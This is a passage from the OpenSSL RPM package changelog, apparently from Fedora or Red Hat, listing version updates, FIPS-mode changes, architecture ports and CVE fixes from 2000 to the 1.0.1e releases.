with FIPS drbg\n[1.0.1e-24]\n- additional changes required for FIPS validation\n- disable verification of certificate, CRL, and OCSP signatures\n using MD5 if OPENSSL_ENABLE_MD5_VERIFY environment variable\n is not set\n[1.0.1e-23]\n- add back support for secp521r1 EC curve\n- add aarch64 to Configure (#969692)\n[1.0.1e-22]\n- do not advertise ECC curves we do not support (#1022493)\n[1.0.1e-21]\n- make DTLS1 work in FIPS mode\n- avoid RSA and DSA 512 bits and Whirlpool in 'openssl speed' in FIPS mode\n- drop the -fips subpackage, installation of dracut-fips marks that the FIPS\n module is installed\n- avoid dlopening libssl.so from libcrypto\n- fix small memory leak in FIPS aes selftest\n- fix segfault in openssl speed hmac in the FIPS mode\n[1.0.1e-20]\n- document the nextprotoneg option in manual pages\n original patch by Hubert Kario\n- try to avoid some races when updating the -fips subpackage\n[1.0.1e-19]\n- use version-release in .hmac suffix to avoid overwrite\n during upgrade\n[1.0.1e-18]\n- always perform the FIPS selftests in library constructor\n if FIPS module is installed\n[1.0.1e-16]\n- add -fips subpackage that contains the FIPS module files\n[1.0.1e-15]\n- fix use of rdrand if available\n- more commits cherry picked from upstream\n- documentation fixes\n[1.0.1e-14]\n- additional manual page fix\n- use symbol versioning also for the textual version\n[1.0.1e-13]\n- additional manual page fixes\n- cleanup speed command output for ECDH ECDSA\n[1.0.1e-12]\n- use _prefix macro\n[1.0.1e-11]\n- add openssl.cnf.5 manpage symlink to config.5\n[1.0.1e-10]\n- add relro linking flag\n[1.0.1e-9]\n- add support for the -trusted_first option for certificate chain verification\n[1.0.1e-8]\n- disable GOST engine\n[1.0.1e-7]\n- add symbol version for ECC functions\n[1.0.1e-6]\n- update the FIPS selftests to use 256 bit curves\n[1.0.1e-5]\n- enabled NIST Suite B ECC curves and algorithms\n[1.0.1e-4]\n- fix random bad record mac errors (#918981)\n[1.0.1e-3]\n- fix up the SHLIB_VERSION_NUMBER\n[1.0.1e-2]\n- disable ZLIB loading by default (due to CRIME attack)\n[1.0.1e-1]\n- new upstream version\n[1.0.1c-12]\n- more fixes from upstream\n- fix errors in manual causing build failure (#904777)\n[1.0.1c-11]\n- add script for renewal of a self-signed cert by Philip Prindeville (#871566)\n- allow X509_issuer_and_serial_hash() produce correct result in\n the FIPS mode (#881336)\n[1.0.1c-10]\n- do not load default verify paths if CApath or CAfile specified (#884305)\n[1.0.1c-9]\n- more fixes from upstream CVS\n- fix DSA key pairwise check (#878597)\n[1.0.1c-8]\n- use 1024 bit DH parameters in s_server as 512 bit is not allowed\n in FIPS mode and it is quite weak anyway\n[1.0.1c-7]\n- add missing initialization of str in aes_ccm_init_key (#853963)\n- add important patches from upstream CVS\n- use the secure_getenv() with new glibc\n[1:1.0.1c-6]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_18_Mass_Rebuild\n[1.0.1c-5]\n- use __getenv_secure() instead of __libc_enable_secure\n[1.0.1c-4]\n- do not move libcrypto to /lib\n- do not use environment variables if __libc_enable_secure is on\n- fix strict aliasing problems in modes\n[1.0.1c-3]\n- fix DSA key generation in FIPS mode (#833866)\n- allow duplicate FIPS_mode_set(1)\n- enable build on ppc64 subarch (#834652)\n[1.0.1c-2]\n- fix s_server with new glibc when no global IPv6 address (#839031)\n- make it build with new Perl\n[1.0.1c-1]\n- new upstream version\n[1.0.1b-1]\n- new upstream version\n[1.0.1a-1]\n- new upstream version fixing CVE-2012-2110\n[1.0.1-3]\n- add Kerberos 5 libraries to pkgconfig for static linking (#807050)\n[1.0.1-2]\n- backports from upstream CVS\n- fix segfault when /dev/urandom is not available (#809586)\n[1.0.1-1]\n- new upstream release\n[1.0.1-0.3.beta3]\n- add obsoletes to assist multilib updates (#799636)\n[1.0.1-0.2.beta3]\n- epoch bumped to 1 due to revert to 1.0.0g on Fedora 17\n- new upstream release from the 1.0.1 branch\n- fix s390x build (#798411)\n- versioning for the SSLeay symbol (#794950)\n- add -DPURIFY to build flags (#797323)\n- filter engine provides\n- split the libraries to a separate -libs package\n- add make to requires on the base package (#783446)\n[1.0.1-0.1.beta2]\n- new upstream release from the 1.0.1 branch, ABI compatible\n- add documentation for the -no_ign_eof option\n[1.0.0g-1]\n- new upstream release fixing CVE-2012-0050 - DoS regression in\n DTLS support introduced by the previous release (#782795)\n[1.0.0f-1]\n- new upstream release fixing multiple CVEs\n[1.0.0e-4]\n- move the libraries needed for static linking to Libs.private\n[1.0.0e-3]\n- do not use AVX instructions when osxsave bit not set\n- add direct known answer tests for SHA2 algorithms\n[1.0.0e-2]\n- fix missing initialization of variable in CHIL engine\n[1.0.0e-1]\n- new upstream release fixing CVE-2011-3207 (#736088)\n[1.0.0d-8]\n- drop the separate engine for Intel acceleration improvements\n and merge in the AES-NI, SHA1, and RC4 optimizations\n- add support for OPENSSL_DISABLE_AES_NI environment variable\n that disables the AES-NI support\n[1.0.0d-7]\n- correct openssl cms help output (#636266)\n- more tolerant starttls detection in XMPP protocol (#608239)\n[1.0.0d-6]\n- add support for newest Intel acceleration improvements backported\n from upstream by Intel in form of a separate engine\n[1.0.0d-5]\n- allow the AES-NI engine in the FIPS mode\n[1.0.0d-4]\n- add API necessary for CAVS testing of the new DSA parameter generation\n[1.0.0d-3]\n- add support for VIA Padlock on 64bit arch from upstream (#617539)\n- do not return bogus values from load_certs (#652286)\n[1.0.0d-2]\n- clarify apps help texts for available digest algorithms (#693858)\n[1.0.0d-1]\n- new upstream release fixing CVE-2011-0014 (OCSP stapling vulnerability)\n[1.0.0c-4]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_15_Mass_Rebuild\n[1.0.0c-3]\n- add -x931 parameter to openssl genrsa command to use the ANSI X9.31\n key generation method\n- use FIPS-186-3 method for DSA parameter generation\n- add OPENSSL_FIPS_NON_APPROVED_MD5_ALLOW environment variable\n to allow using MD5 when the system is in the maintenance state\n even if the /proc fips flag is on\n- make openssl pkcs12 command work by default in the FIPS mode\n[1.0.0c-2]\n- listen on ipv6 wildcard in s_server so we accept connections\n from both ipv4 and ipv6 (#601612)\n- fix openssl speed command so it can be used in the FIPS mode\n with FIPS allowed ciphers\n[1.0.0c-1]\n- new upstream version fixing CVE-2010-4180\n[1.0.0b-3]\n- replace the revert for the s390x bignum asm routines with\n fix from upstream\n[1.0.0b-2]\n- revert upstream change in s390x bignum asm routines\n[1.0.0b-1]\n- new upstream version fixing CVE-2010-3864 (#649304)\n[1.0.0a-3]\n- make SHLIB_VERSION reflect the library suffix\n[1.0.0a-2]\n- openssl man page fix (#609484)\n[1.0.0a-1]\n- new upstream patch release, fixes CVE-2010-0742 (#598738)\n and CVE-2010-1633 (#598732)\n[1.0.0-5]\n- pkgconfig files now contain the correct libdir (#593723)\n[1.0.0-4]\n- make CA dir readable - the private keys are in private subdir (#584810)\n[1.0.0-3]\n- a few fixes from upstream CVS\n- move libcrypto to /lib (#559953)\n[1.0.0-2]\n- set UTC timezone on pod2man run (#578842)\n- make X509_NAME_hash_old work in FIPS mode\n[1.0.0-1]\n- update to final 1.0.0 upstream release\n[1.0.0-0.22.beta5]\n- make TLS work in the FIPS mode\n[1.0.0-0.21.beta5]\n- gracefully handle zero length in assembler implementations of\n OPENSSL_cleanse (#564029)\n- do not fail in s_server if client hostname not resolvable (#561260)\n[1.0.0-0.20.beta5]\n- new upstream release\n[1.0.0-0.19.beta4]\n- fix CVE-2009-4355 - leak in applications incorrectly calling\n CRYPTO_free_all_ex_data() before application exit (#546707)\n- upstream fix for future TLS protocol version handling\n[1.0.0-0.18.beta4]\n- add support for Intel AES-NI\n[1.0.0-0.17.beta4]\n- upstream fix compression handling on session resumption\n- various null checks and other small fixes from upstream\n- upstream changes for the renegotiation info according to the latest draft\n[1.0.0-0.16.beta4]\n- fix non-fips mingw build (patch by Kalev Lember)\n- add IPV6 fix for DTLS\n[1.0.0-0.15.beta4]\n- add better error reporting for the unsafe renegotiation\n[1.0.0-0.14.beta4]\n- fix build on s390x\n[1.0.0-0.13.beta4]\n- disable enforcement of the renegotiation extension on the client (#537962)\n- add fixes from the current upstream snapshot\n[1.0.0-0.12.beta4]\n- keep the beta status in version number at 3 so we do not have to rebuild\n openssh and possibly other dependencies with too strict version check\n[1.0.0-0.11.beta4]\n- update to new upstream version, no soname bump needed\n- fix CVE-2009-3555 - note that the fix is bypassed if SSL_OP_ALL is used\n so the compatibility with unfixed clients is not broken. The\n protocol extension is also not final.\n[1.0.0-0.10.beta3]\n- fix use of freed memory if SSL_CTX_free() is called before\n SSL_free() (#521342)\n[1.0.0-0.9.beta3]\n- fix typo in DTLS1 code (#527015)\n- fix leak in error handling of d2i_SSL_SESSION()\n[1.0.0-0.8.beta3]\n- fix RSA and DSA FIPS selftests\n- reenable fixed x86_64 camellia assembler code (#521127)\n[1.0.0-0.7.beta3]\n- temporarily disable x86_64 camellia assembler code (#521127)\n[1.0.0-0.6.beta3]\n- fix openssl dgst -dss1 (#520152)\n[1.0.0-0.5.beta3]\n- drop the compat symlink hacks\n[1.0.0-0.4.beta3]\n- constify SSL_CIPHER_description()\n[1.0.0-0.3.beta3]\n- fix WWW:Curl:Easy reference in tsget\n[1.0.0-0.2.beta3]\n- enable MD-2\n[1.0.0-0.1.beta3]\n- update to new major upstream release\n[0.9.8k-7]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n* Wed Jul 22 2009 Bill Nottingham \n- do not build special 'optimized' versions for i686, as that's the base\n arch in Fedora now\n[0.9.8k-6]\n- abort if selftests failed and random number generator is polled\n- mention EVP_aes and EVP_sha2xx routines in the manpages\n- add README.FIPS\n- make CA dir absolute path (#445344)\n- change default length for RSA key generation to 2048 (#484101)\n[0.9.8k-5]\n- fix CVE-2009-1377 CVE-2009-1378 CVE-2009-1379\n (DTLS DoS problems) (#501253, #501254, #501572)\n[0.9.8k-4]\n- support compatibility DTLS mode for CISCO AnyConnect (#464629)\n[0.9.8k-3]\n- correct the SHLIB_VERSION define\n[0.9.8k-2]\n- add support for multiple CRLs with same subject\n- load only dynamic engine support in FIPS mode\n[0.9.8k-1]\n- update to new upstream release (minor bug fixes, security\n fixes and machine code optimizations only)\n[0.9.8j-10]\n- move libraries to /usr/lib (#239375)\n[0.9.8j-9]\n- add a static subpackage\n[0.9.8j-8]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n[0.9.8j-7]\n- must also verify checksum of libssl.so in the FIPS mode\n- obtain the seed for FIPS rng directly from the kernel device\n- drop the temporary symlinks\n[0.9.8j-6]\n- drop the temporary triggerpostun and symlinking in post\n- fix the pkgconfig files and drop the unnecessary buildrequires\n on pkgconfig as it is a rpmbuild dependency (#481419)\n[0.9.8j-5]\n- add temporary triggerpostun to reinstate the symlinks\n[0.9.8j-4]\n- no pairwise key tests in non-fips mode (#479817)\n[0.9.8j-3]\n- even more robust test for the temporary symlinks\n[0.9.8j-2]\n- try to ensure the temporary symlinks exist\n[0.9.8j-1]\n- new upstream version with necessary soname bump (#455753)\n- temporarily provide symlink to old soname to make it possible to rebuild\n the dependent packages in rawhide\n- add eap-fast support (#428181)\n- add possibility to disable zlib by setting\n- add fips mode support for testing purposes\n- do not null dereference on some invalid smime files\n- add buildrequires pkgconfig (#479493)\n[0.9.8g-11]\n- do not add tls extensions to server hello for SSLv3 either\n[0.9.8g-10]\n- move root CA bundle to ca-certificates package\n[0.9.8g-9]\n- fix CVE-2008-0891 - server name extension crash (#448492)\n- fix CVE-2008-1672 - server key exchange message omit crash (#448495)\n[0.9.8g-8]\n- super-H arch support\n- drop workaround for bug 199604 as it should be fixed in gcc-4.3\n[0.9.8g-7]\n- sparc handling\n[0.9.8g-6]\n- update to new root CA bundle from mozilla.org (r1.45)\n[0.9.8g-5]\n- Autorebuild for GCC 4.3\n[0.9.8g-4]\n- merge review fixes (#226220)\n- adjust the SHLIB_VERSION_NUMBER to reflect library name (#429846)\n[0.9.8g-3]\n- set default paths when no explicit paths are set (#418771)\n- do not add tls extensions to client hello for SSLv3 (#422081)\n[0.9.8g-2]\n- enable some new crypto algorithms and features\n- add some more important bug fixes from openssl CVS\n[0.9.8g-1]\n- update to latest upstream release, SONAME bumped to 7\n[0.9.8b-17]\n- update to new CA bundle from mozilla.org\n[0.9.8b-16]\n- fix CVE-2007-5135 - off-by-one in SSL_get_shared_ciphers (#309801)\n- fix CVE-2007-4995 - out of order DTLS fragments buffer overflow (#321191)\n- add alpha sub-archs (#296031)\n[0.9.8b-15]\n- rebuild\n[0.9.8b-14]\n- use localhost in testsuite, hopefully fixes slow build in koji\n- CVE-2007-3108 - fix side channel attack on private keys (#250577)\n- make ssl session cache id matching strict (#233599)\n[0.9.8b-13]\n- allow building on ARM architectures (#245417)\n- use reference timestamps to prevent multilib conflicts (#218064)\n- -devel package must require pkgconfig (#241031)\n[0.9.8b-12]\n- detect duplicates in add_dir properly (#206346)\n[0.9.8b-11]\n- the previous change still didn't make X509_NAME_cmp transitive\n[0.9.8b-10]\n- make X509_NAME_cmp transitive otherwise certificate lookup\n is broken (#216050)\n[0.9.8b-9]\n- aliasing bug in engine loading, patch by IBM (#213216)\n[0.9.8b-8]\n- CVE-2006-2940 fix was incorrect (#208744)\n[0.9.8b-7]\n- fix CVE-2006-2937 - mishandled error on ASN.1 parsing (#207276)\n- fix CVE-2006-2940 - parasitic public keys DoS (#207274)\n- fix CVE-2006-3738 - buffer overflow in SSL_get_shared_ciphers (#206940)\n- fix CVE-2006-4343 - sslv2 client DoS (#206940)\n[0.9.8b-6]\n- fix CVE-2006-4339 - prevent attack on PKCS#1 v1.5 signatures (#205180)\n[0.9.8b-5]\n- set buffering to none on stdio/stdout FILE when bufsize is set (#200580)\n patch by IBM\n[0.9.8b-4.1]\n- rebuild with new binutils (#200330)\n[0.9.8b-4]\n- add a temporary workaround for sha512 test failure on s390 (#199604)\n* Thu Jul 20 2006 Tomas Mraz \n- add ipv6 support to s_client and s_server (by Jan Pazdziora) (#198737)\n- add patches for BN threadsafety, AES cache collision attack hazard fix and\n pkcs7 code memleak fix from upstream CVS\n[0.9.8b-3.1]\n- rebuild\n[0.9.8b-3]\n- dropped libica and ica engine from build\n* Wed Jun 21 2006 Joe Orton \n- update to new CA bundle from mozilla.org; adds CA certificates\n from netlock.hu and startcom.org\n[0.9.8b-2]\n- fixed a few rpmlint warnings\n- better fix for #173399 from upstream\n- upstream fix for pkcs12\n[0.9.8b-1]\n- upgrade to new version, stays ABI compatible\n- there is no more linux/config.h (it was empty anyway)\n[0.9.8a-6]\n- fix stale open handles in libica (#177155)\n- fix build if 'rand' or 'passwd' in buildroot path (#178782)\n- initialize VIA Padlock engine (#186857)\n[0.9.8a-5.2]\n- bump again for double-long bug on ppc(64)\n[0.9.8a-5.1]\n- rebuilt for new gcc4.1 snapshot and glibc changes\n[0.9.8a-5]\n- don't include SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG\n in SSL_OP_ALL (#175779)\n* Fri Dec 09 2005 Jesse Keating \n- rebuilt\n[0.9.8a-4]\n- fix build (-lcrypto was erroneusly dropped) of the updated libica\n- updated ICA engine to 1.3.6-rc3\n[0.9.8a-3]\n- disable builtin compression methods for now until they work\n properly (#173399)\n[0.9.8a-2]\n- don't set -rpath for openssl binary\n[0.9.8a-1]\n- new upstream version\n- patches partially renumbered\n[0.9.7f-11]\n- updated IBM ICA engine library and patch to latest upstream version\n[0.9.7f-10]\n- fix CAN-2005-2969 - remove SSL_OP_MSIE_SSLV2_RSA_PADDING which\n disables the countermeasure against man in the middle attack in SSLv2\n (#169863)\n- use sha1 as default for CA and cert requests - CAN-2005-2946 (#169803)\n[0.9.7f-9]\n- add *.so.soversion as symlinks in /lib (#165264)\n- remove unpackaged symlinks (#159595)\n- fixes from upstream (constant time fixes for DSA,\n bn assembler div on ppc arch, initialize memory on realloc)\n[0.9.7f-8]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7f-7]\n- fix CAN-2005-0109 - use constant time/memory access mod_exp\n so bits of private key aren't leaked by cache eviction (#157631)\n- a few more fixes from upstream 0.9.7g\n[0.9.7f-6]\n- use poll instead of select in rand (#128285)\n- fix Makefile.certificate to point to /etc/pki/tls\n- change the default string mask in ASN1 to PrintableString+UTF8String\n[0.9.7f-5]\n- update to revision 1.37 of Mozilla CA bundle\n[0.9.7f-4]\n- move certificates to _sysconfdir/pki/tls (#143392)\n- move CA directories to _sysconfdir/pki/CA\n- patch the CA script and the default config so it points to the\n CA directories\n[0.9.7f-3]\n- uninitialized variable mustn't be used as input in inline\n assembly\n- reenable the x86_64 assembly again\n[0.9.7f-2]\n- add back RC4_CHAR on ia64 and x86_64 so the ABI isn't broken\n- disable broken bignum assembly on x86_64\n[0.9.7f-1]\n- reenable optimizations on ppc64 and assembly code on ia64\n- upgrade to new upstream version (no soname bump needed)\n- disable thread test - it was testing the backport of the\n RSA blinding - no longer needed\n- added support for changing serial number to\n Makefile.certificate (#151188)\n- make ca-bundle.crt a config file (#118903)\n[0.9.7e-3]\n- libcrypto shouldn't depend on libkrb5 (#135961)\n[0.9.7e-2]\n- rebuild\n[0.9.7e-1]\n- new upstream source, updated patches\n- added patch so we are hopefully ABI compatible with upcoming\n 0.9.7f\n* Thu Feb 10 2005 Tomas Mraz \n- Support UTF-8 charset in the Makefile.certificate (#134944)\n- Added cmp to BuildPrereq\n[0.9.7a-46]\n- generate new ca-bundle.crt from Mozilla certdata.txt (revision 1.32)\n[0.9.7a-45]\n- Fixed and updated libica-1.3.4-urandom.patch patch (#122967)\n[0.9.7a-44]\n- rebuild\n[0.9.7a-43]\n- rebuild\n[0.9.7a-42]\n- rebuild\n[0.9.7a-41]\n- remove der_chop, as upstream cvs has done (CAN-2004-0975, #140040)\n[0.9.7a-40]\n- Include latest libica version with important bugfixes\n* Tue Jun 15 2004 Elliot Lee \n- rebuilt\n[0.9.7a-38]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7a-37]\n- build for linux-alpha-gcc instead of alpha-gcc on alpha (Jeff Garzik)\n[0.9.7a-36]\n- handle %{_arch}=i486/i586/i686/athlon cases in the intermediate\n header (#124303)\n[0.9.7a-35]\n- add security fixes for CAN-2004-0079, CAN-2004-0112\n* Tue Mar 16 2004 Phil Knirsch \n- Fixed libica filespec.\n[0.9.7a-34]\n- ppc/ppc64 define __powerpc__/__powerpc64__, not __ppc__/__ppc64__, fix\n the intermediate header\n[0.9.7a-33]\n- add an intermediate \n which points to the right\n arch-specific opensslconf.h on multilib arches\n* Tue Mar 02 2004 Elliot Lee \n- rebuilt\n[0.9.7a-32]\n- Updated libica to latest upstream version 1.3.5.\n[0.9.7a-31]\n- Update ICA crypto engine patch from IBM to latest version.\n* Fri Feb 13 2004 Elliot Lee \n- rebuilt\n[0.9.7a-29]\n- rebuilt\n[0.9.7a-28]\n- Fixed libica build.\n* Wed Feb 04 2004 Nalin Dahyabhai \n- add '-ldl' to link flags added for Linux-on-ARM (#99313)\n[0.9.7a-27]\n- updated ca-bundle.crt: removed expired GeoTrust roots, added\n freessl.com root, removed trustcenter.de Class 0 root\n[0.9.7a-26]\n- Fix link line for libssl (bug #111154).\n[0.9.7a-25]\n- add dependency on zlib-devel for the -devel package, which depends on zlib\n symbols because we enable zlib for libssl (#102962)\n[0.9.7a-24]\n- Use /dev/urandom instead of PRNG for libica.\n- Apply libica-1.3.5 fix for /dev/urandom in icalinux.c\n- Use latest ICA engine patch from IBM.\n[0.9.7a-22.1]\n- rebuild\n[0.9.7a-22]\n- rebuild (22 wasn't actually built, fun eh?)\n[0.9.7a-23]\n- re-disable optimizations on ppc64\n* Tue Sep 30 2003 Joe Orton \n- add a_mbstr.c fix for 64-bit platforms from CVS\n[0.9.7a-22]\n- add -Wa,--noexecstack to RPM_OPT_FLAGS so that assembled modules get tagged\n as not needing executable stacks\n[0.9.7a-21]\n- rebuild\n* Thu Sep 25 2003 Nalin Dahyabhai \n- re-enable optimizations on ppc64\n* Thu Sep 25 2003 Nalin Dahyabhai \n- remove exclusivearch\n[0.9.7a-20]\n- only parse a client cert if one was requested\n- temporarily exclusivearch for %{ix86}\n* Tue Sep 23 2003 Nalin Dahyabhai \n- add security fixes for protocol parsing bugs (CAN-2003-0543, CAN-2003-0544)\n and heap corruption (CAN-2003-0545)\n- update RHNS-CA-CERT files\n- ease back on the number of threads used in the threading test\n[0.9.7a-19]\n- rebuild to fix gzipped file md5sums (#91211)\n[0.9.7a-18]\n- Updated libica to version 1.3.4.\n[0.9.7a-17]\n- rebuild\n[0.9.7a-10.9]\n- free the kssl_ctx structure when we free an SSL structure (#99066)\n[0.9.7a-16]\n- rebuild\n[0.9.7a-15]\n- lower thread test count on s390x\n[0.9.7a-14]\n- rebuild\n[0.9.7a-13]\n- disable assembly on arches where it seems to conflict with threading\n[0.9.7a-12]\n- Updated libica to latest upstream version 1.3.0\n[0.9.7a-9.9]\n- rebuild\n[0.9.7a-11]\n- rebuild\n[0.9.7a-10]\n- ubsec: don't stomp on output data which might also be input data\n[0.9.7a-9]\n- temporarily disable optimizations on ppc64\n* Mon Jun 09 2003 Nalin Dahyabhai \n- backport fix for engine-used-for-everything from 0.9.7b\n- backport fix for prng not being seeded causing problems, also from 0.9.7b\n- add a check at build-time to ensure that RSA is thread-safe\n- keep perlpath from stomping on the libica configure scripts\n* Fri Jun 06 2003 Nalin Dahyabhai \n- thread-safety fix for RSA blinding\n[0.9.7a-8]\n- rebuilt\n[0.9.7a-7]\n- Added libica-1.2 to openssl (featurerequest).\n[0.9.7a-6]\n- fix building with incorrect flags on ppc64\n[0.9.7a-5]\n- add patch to harden against Klima-Pokorny-Rosa extension of Bleichenbacher's\n attack (CAN-2003-0131)\n[ 0.9.7a-4]\n- add patch to enable RSA blinding by default, closing a timing attack\n (CAN-2003-0147)\n[0.9.7a-3]\n- disable use of BN assembly module on x86_64, but continue to allow inline\n assembly (#83403)\n[0.9.7a-2]\n- disable EC algorithms\n[0.9.7a-1]\n- update to 0.9.7a\n[0.9.7-8]\n- add fix to guard against attempts to allocate negative amounts of memory\n- add patch for CAN-2003-0078, fixing a timing attack\n[0.9.7-7]\n- Add openssl-ppc64.patch\n[0.9.7-6]\n- EVP_DecryptInit should call EVP_CipherInit() instead of EVP_CipherInit_ex(),\n to get the right behavior when passed uninitialized context structures\n (#83766)\n- build with -mcpu=ev5 on alpha family (#83828)\n* Wed Jan 22 2003 Tim Powers \n- rebuilt\n[0.9.7-4]\n- Added IBM hw crypto support patch.\n* Wed Jan 15 2003 Nalin Dahyabhai \n- add missing builddep on sed\n[0.9.7-3]\n- debloat\n- fix broken manpage symlinks\n[0.9.7-2]\n- fix double-free in 'openssl ca'\n[0.9.7-1]\n- update to 0.9.7 final\n[0.9.7-0]\n- update to 0.9.7 beta6 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n* Wed Dec 11 2002 Nalin Dahyabhai \n- update to 0.9.7 beta5 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n[0.9.6b-30]\n- add configuration stanza for x86_64 and use it on x86_64\n- build for linux-ppc on ppc\n- start running the self-tests again\n[0.9.6b-29hammer.3]\n- Merge fixes from previous hammer packages, including general x86-64 and\n multilib\n[0.9.6b-29]\n- rebuild\n[0.9.6b-28]\n- update asn patch to fix accidental reversal of a logic check\n[0.9.6b-27]\n- update asn patch to reduce chance that compiler optimization will remove\n one of the added tests\n[0.9.6b-26]\n- rebuild\n[0.9.6b-25]\n- add patch to fix ASN.1 vulnerabilities\n[0.9.6b-24]\n- add backport of Ben Laurie's patches for OpenSSL 0.9.6d\n[0.9.6b-23]\n- own {_datadir}/ssl/misc\n* Fri Jun 21 2002 Tim Powers \n- automated rebuild\n* Sun May 26 2002 Tim Powers \n- automated rebuild\n[0.9.6b-20]\n- free ride through the build system (whee!)\n[0.9.6b-19]\n- rebuild in new environment\n[0.9.6b-17, 0.9.6b-18]\n- merge RHL-specific bits into stronghold package, rename\n[stronghold-0.9.6c-2]\n- add support for Chrysalis Luna token\n* Tue Mar 26 2002 Gary Benson \n- disable AEP random number generation, other AEP fixes\n[0.9.6b-15]\n- only build subpackages on primary arches\n[0.9.6b-13]\n- on ia32, only disable use of assembler on i386\n- enable assembly on ia64\n[0.9.6b-11]\n- fix sparcv9 entry\n[stronghold-0.9.6c-1]\n- upgrade to 0.9.6c\n- bump BuildArch to i686 and enable assembler on all platforms\n- synchronise with shrimpy and rawhide\n- bump soversion to 3\n* Wed Oct 10 2001 Florian La Roche \n- delete BN_LLONG for s390x, patch from Oliver Paukstadt\n[0.9.6b-9]\n- update AEP driver patch\n* Mon Sep 10 2001 Nalin Dahyabhai \n- adjust RNG disabling patch to match version of patch from Broadcom\n[0.9.6b-8]\n- disable the RNG in the ubsec engine driver\n[0.9.6b-7]\n- tweaks to the ubsec engine driver\n[0.9.6b-6]\n- tweaks to the ubsec engine driver\n[0.9.6b-5]\n- update ubsec engine driver from Broadcom\n[0.9.6b-4]\n- move man pages back to %{_mandir}/man?/foo.?ssl from\n %{_mandir}/man?ssl/foo.?\n- add an [ engine ] section to the default configuration file\n* Thu Aug 09 2001 Nalin Dahyabhai \n- add a patch for selecting a default engine in SSL_library_init()\n[0.9.6b-3]\n- add patches for AEP hardware support\n- add patch to keep trying when we fail to load a cert from a file and\n there are more in the file\n- add missing prototype for ENGINE_ubsec() in engine_int.h\n[0.9.6b-2]\n- actually add hw_ubsec to the engine list\n* Tue Jul 17 2001 Nalin Dahyabhai \n- add in the hw_ubsec driver from CVS\n[0.9.6b-1]\n- update to 0.9.6b\n* Thu Jul 05 2001 Nalin Dahyabhai \n- move .so symlinks back to %{_libdir}\n* Tue Jul 03 2001 Nalin Dahyabhai \n- move shared libraries to /lib (#38410)\n* Mon Jun 25 2001 Nalin Dahyabhai \n- switch to engine code base\n* Mon Jun 18 2001 Nalin Dahyabhai \n- add a script for creating dummy certificates\n- move man pages from %{_mandir}/man?/foo.?ssl to %{_mandir}/man?ssl/foo.?\n* Thu Jun 07 2001 Florian La Roche \n- add s390x support\n* Fri Jun 01 2001 Nalin Dahyabhai \n- change two memcpy() calls to memmove()\n- don't define L_ENDIAN on alpha\n[stronghold-0.9.6a-1]\n- Add 'stronghold-' prefix to package names.\n- Obsolete standard openssl packages.\n* Wed May 16 2001 Joe Orton \n- Add BuildArch: i586 as per Nalin's advice.\n* Tue May 15 2001 Joe Orton \n- Enable assembler on ix86 (using new .tar.bz2 which does\n include the asm directories).\n* Tue May 15 2001 Nalin Dahyabhai \n- make subpackages depend on the main package\n* Tue May 01 2001 Nalin Dahyabhai \n- adjust the hobble script to not disturb symlinks in include/ (fix from\n Joe Orton)\n* Fri Apr 27 2001 Nalin Dahyabhai \n- drop the m2crypo patch we weren't using\n* Tue Apr 24 2001 Nalin Dahyabhai \n- configure using 'shared' as well\n* Sun Apr 08 2001 Nalin Dahyabhai \n- update to 0.9.6a\n- use the build-shared target to build shared libraries\n- bump the soversion to 2 because we're no longer compatible with\n our 0.9.5a packages or our 0.9.6 packages\n- drop the patch for making rsatest a no-op when rsa null support is used\n- put all man pages into \nssl instead of \n- break the m2crypto modules into a separate package\n* Tue Mar 13 2001 Nalin Dahyabhai \n- use BN_LLONG on s390\n* Mon Mar 12 2001 Nalin Dahyabhai \n- fix the s390 changes for 0.9.6 (isn't supposed to be marked as 64-bit)\n* Sat Mar 03 2001 Nalin Dahyabhai \n- move c_rehash to the perl subpackage, because it's a perl script now\n* Fri Mar 02 2001 Nalin Dahyabhai \n- update to 0.9.6\n- enable MD2\n- use the libcrypto.so and libssl.so targets to build shared libs with\n- bump the soversion to 1 because we're no longer compatible with any of\n the various 0.9.5a packages circulating around, which provide lib*.so.0\n* Wed Feb 28 2001 Florian La Roche \n- change hobble-openssl for disabling MD2 again\n* Tue Feb 27 2001 Nalin Dahyabhai \n- re-disable MD2 -- the EVP_MD_CTX structure would grow from 100 to 152\n bytes or so, causing EVP_DigestInit() to zero out stack variables in\n apps built against a version of the library without it\n* Mon Feb 26 2001 Nalin Dahyabhai \n- disable some inline assembly, which on x86 is Pentium-specific\n- re-enable MD2 (see http://www.ietf.org/ietf/IPR/RSA-MD-all)\n* Thu Feb 08 2001 Florian La Roche \n- fix s390 patch\n* Fri Dec 08 2000 Than Ngo \n- added support s390\n* Mon Nov 20 2000 Nalin Dahyabhai \n- remove -Wa,* and -m* compiler flags from the default Configure file (#20656)\n- add the CA.pl man page to the perl subpackage\n* Thu Nov 02 2000 Nalin Dahyabhai \n- always build with -mcpu=ev5 on alpha\n* Tue Oct 31 2000 Nalin Dahyabhai \n- add a symlink from cert.pem to ca-bundle.crt\n* Wed Oct 25 2000 Nalin Dahyabhai \n- add a ca-bundle file for packages like Samba to reference for CA certificates\n* Tue Oct 24 2000 Nalin Dahyabhai \n- remove libcrypto's crypt(), which doesn't handle md5crypt (#19295)\n* Mon Oct 02 2000 Nalin Dahyabhai \n- add unzip as a buildprereq (#17662)\n- update m2crypto to 0.05-snap4\n* Tue Sep 26 2000 Bill Nottingham \n- fix some issues in building when it's not installed\n* Wed Sep 06 2000 Nalin Dahyabhai \n- make sure the headers we include are the ones we built with (aaaaarrgh!)\n* Fri Sep 01 2000 Nalin Dahyabhai \n- add Richard Henderson's patch for BN on ia64\n- clean up the changelog\n* Tue Aug 29 2000 Nalin Dahyabhai \n- fix the building of python modules without openssl-devel already installed\n* Wed Aug 23 2000 Nalin Dahyabhai \n- byte-compile python extensions without the build-root\n- adjust the makefile to not remove temporary files (like .key files when\n building .csr files) by marking them as .PRECIOUS\n* Sat Aug 19 2000 Nalin Dahyabhai \n- break out python extensions into a subpackage\n* Mon Jul 17 2000 Nalin Dahyabhai \n- tweak the makefile some more\n* Tue Jul 11 2000 Nalin Dahyabhai \n- disable MD2 support\n* Thu Jul 06 2000 